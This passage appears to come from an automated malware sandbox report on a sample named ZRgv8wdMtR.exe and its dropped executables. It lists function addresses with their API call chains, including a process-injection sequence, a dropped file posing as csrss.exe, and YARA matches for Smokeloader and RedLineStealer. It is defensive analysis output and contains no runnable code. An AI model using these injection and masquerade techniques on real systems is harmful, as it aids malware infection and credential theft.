                                Source: C:\Users\user\AppData\Roaming\wesswwiCode function: 3_2_004015CB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,LocalAlloc,NtMapViewOfSection,VirtualProtect,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,3_2_004015CB
                                Source: C:\Users\user\AppData\Roaming\wesswwiCode function: 3_2_0040159B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,LocalAlloc,NtMapViewOfSection,VirtualProtect,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,3_2_0040159B
                                Source: C:\Users\user\AppData\Roaming\wesswwiCode function: 3_2_004015B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,LocalAlloc,NtMapViewOfSection,VirtualProtect,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,3_2_004015B0
                                Source: C:\Users\user\AppData\Roaming\wesswwiCode function: 3_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,LocalAlloc,NtMapViewOfSection,VirtualProtect,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,3_2_004015BC
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeCode function: 6_2_02890110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,6_2_02890110
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04FF16E0 NtCreateThreadEx,10_2_04FF16E0
                                Source: C:\ProgramData\Drivers\csrss.exeCode function: 14_2_02E00110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,14_2_02E00110
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B54E508_2_00007FF6E1B54E50
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B55D9C8_2_00007FF6E1B55D9C
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B367A08_2_00007FF6E1B367A0
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B4FA388_2_00007FF6E1B4FA38
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B531FC8_2_00007FF6E1B531FC
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B409D08_2_00007FF6E1B409D0
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B509E48_2_00007FF6E1B509E4
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B411F08_2_00007FF6E1B411F0
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B4CC348_2_00007FF6E1B4CC34
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B42C348_2_00007FF6E1B42C34
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B40BD48_2_00007FF6E1B40BD4
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B48BD08_2_00007FF6E1B48BD0
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B413F48_2_00007FF6E1B413F4
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B31B908_2_00007FF6E1B31B90
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B58B988_2_00007FF6E1B58B98
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B41EA08_2_00007FF6E1B41EA0
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B40DE08_2_00007FF6E1B40DE0
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B465908_2_00007FF6E1B46590
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B4FA388_2_00007FF6E1B4FA38
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B52D608_2_00007FF6E1B52D60
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B550CC8_2_00007FF6E1B550CC
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B4D0C88_2_00007FF6E1B4D0C8
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B380D08_2_00007FF6E1B380D0
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B467448_2_00007FF6E1B46744
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B558508_2_00007FF6E1B55850
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B428308_2_00007FF6E1B42830
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B46FC88_2_00007FF6E1B46FC8
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B40FE48_2_00007FF6E1B40FE4
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B44F808_2_00007FF6E1B44F80
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B467448_2_00007FF6E1B46744
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: 8_2_00007FF6E1B4D7488_2_00007FF6E1B4D748
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04EB2B6410_2_04EB2B64
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04EB578810_2_04EB5788
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04EB15F010_2_04EB15F0
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04EB329510_2_04EB3295
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04EB25B410_2_04EB25B4
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04FF16E010_2_04FF16E0
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04FF1AD010_2_04FF1AD0
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04FF69C010_2_04FF69C0
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04FF66C010_2_04FF66C0
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04FF5C8010_2_04FF5C80
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04FF637010_2_04FF6370
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04FF1E6010_2_04FF1E60
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04FF58D010_2_04FF58D0
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04FF6FB010_2_04FF6FB0
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04FF13A010_2_04FF13A0
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04FF288010_2_04FF2880
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04FF5F5010_2_04FF5F50
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04FF6C5010_2_04FF6C50
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04FF2B4010_2_04FF2B40
                                Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_04FF100010_2_04FF1000
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeCode function: 11_2_01E1D42411_2_01E1D424
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeCode function: 11_2_0929004011_2_09290040
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeCode function: 11_2_09290A1011_2_09290A10
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeCode function: 11_2_092914E011_2_092914E0
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeCode function: 11_2_09293A7A11_2_09293A7A
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeCode function: 11_2_09293A8811_2_09293A88
                                Source: C:\Users\user\AppData\Local\Temp\B013.exeCode function: 11_2_09295F1811_2_09295F18
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0040100012_2_00401000
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0040123012_2_00401230
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0040798812_2_00407988
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005F705012_2_005F7050
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005F800012_2_005F8000
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0061E8FD12_2_0061E8FD
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005D70E012_2_005D70E0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005F40B012_2_005F40B0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005D38A012_2_005D38A0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005F296012_2_005F2960
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005C693012_2_005C6930
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005F213012_2_005F2130
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005C49C012_2_005C49C0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005F61F012_2_005F61F0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0060A98012_2_0060A980
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005D69A012_2_005D69A0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0060C26012_2_0060C260
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_00619A6B12_2_00619A6B
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005D2A4012_2_005D2A40
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0060CA4012_2_0060CA40
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0060BA5012_2_0060BA50
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005F826012_2_005F8260
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005F0AC012_2_005F0AC0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_006102D012_2_006102D0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005C32A012_2_005C32A0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005C73F012_2_005C73F0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0061AB9312_2_0061AB93
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0062BC5712_2_0062BC57
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0060B4E012_2_0060B4E0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005EF4F012_2_005EF4F0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005F3C9012_2_005F3C90
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005F34A012_2_005F34A0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0060FD6012_2_0060FD60
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005D354012_2_005D3540
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005D6D1012_2_005D6D10
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0062BD0F12_2_0062BD0F
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0060CDF012_2_0060CDF0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_006115F012_2_006115F0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005E0E5012_2_005E0E50
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005C567012_2_005C5670
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0060D65012_2_0060D650
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0060AE3012_2_0060AE30
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0062EE0C12_2_0062EE0C
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_00611E8012_2_00611E80
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005F577012_2_005F5770
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_00629F5E12_2_00629F5E
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0061070012_2_00610700
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005F97D012_2_005F97D0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_005F47C012_2_005F47C0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_00614FC012_2_00614FC0
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: 12_2_0061DF9012_2_0061DF90
                                Source: C:\Users\user\AppData\Local\Temp\A19A.exeCode function: String function: 00007FF6E1B32770 appears 41 times
                                Source: C:\Users\user\AppData\Local\Temp\B43A.exeCode function: String function: 00615F00 appears 35 times
                                Source: FC24.exe.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                Source: FC24.tmp.22.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                Source: FC24.tmp.22.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                                Source: FC24.tmp.22.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Source: FC24.tmp.22.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                                Source: FC24.tmp.27.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                Source: FC24.tmp.27.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                                Source: FC24.tmp.27.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Source: FC24.tmp.27.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                                Source: is-M5V0E.tmp.30.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                                Source: is-M5V0E.tmp.30.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                                Source: is-M5V0E.tmp.30.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Source: is-M5V0E.tmp.30.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                                Source: is-V43EJ.tmp.30.drStatic PE information: Number of sections : 11 > 10
                                Source: is-AUP01.tmp.30.drStatic PE information: Number of sections : 11 > 10
                                Source: is-6NO5U.tmp.30.drStatic PE information: Number of sections : 18 > 10
                                Source: is-82753.tmp.30.drStatic PE information: Number of sections : 11 > 10
                                Source: ZRgv8wdMtR.exe, 00000000.00000000.1640157306.0000000000848000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLariants> vs ZRgv8wdMtR.exe
                                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                                Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                                Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
                                Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: csunsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: swift.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: nfhwcrhk.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: surewarehook.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: csunsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: aep.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: atasi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: swift.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: nfhwcrhk.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: nuronssl.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: surewarehook.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: ubsec.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: aep.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: atasi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: swift.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: nfhwcrhk.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: nuronssl.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: surewarehook.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8F78.exeSection loaded: ubsec.dllJump to behavior
                                Source: C:\ProgramData\Drivers\csrss.exeSection loaded: csunsapi.dll
                                Source: C:\ProgramData\Drivers\csrss.exeSection loaded: swift.dll
                                Source: C:\ProgramData\Drivers\csrss.exeSection loaded: nfhwcrhk.dll
                                Source: C:\ProgramData\Drivers\csrss.exeSection loaded: surewarehook.dll
                                Source: C:\ProgramData\Drivers\csrss.exeSection loaded: csunsapi.dll
                                Source: C:\ProgramData\Drivers\csrss.exeSection loaded: swift.dll
                                Source: C:\ProgramData\Drivers\csrss.exeSection loaded: nfhwcrhk.dll
                                Source: C:\ProgramData\Drivers\csrss.exeSection loaded: surewarehook.dll
                                Source: C:\Users\user\AppData\Local\Temp\E36B.exeSection loaded: .dll
                                Source: ZRgv8wdMtR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: 11.0.B013.exe.dc0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
                                Source: 00000000.00000002.1711385659.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                                Source: 00000003.00000002.1951376961.0000000000A11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                                Source: 00000003.00000002.1951315061.0000000000900000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                                Source: 00000000.00000002.1711305069.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                                Source: 00000011.00000002.2192095995.0000000000A11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                                Source: 0000002B.00000002.2457824291.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                                Source: 00000012.00000002.2203867401.00000000029CB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                                Source: 00000003.00000002.1951330825.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                                Source: 0000002B.00000002.2458238302.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                                Source: 00000013.00000002.2197119051.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                                Source: 00000028.00000002.2308952189.0000000002952000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                                Source: 00000006.00000002.1999543598.00000000026CE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                                Source: 00000011.00000002.2190393639.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                                Source: 00000011.00000002.2192940256.0000000000A49000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                                Source: 0000002B.00000002.2457876157.00000000025E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                                Source: 00000000.00000002.1711095054.0000000000969000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                                Source: 00000003.00000002.1951442963.0000000000A68000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
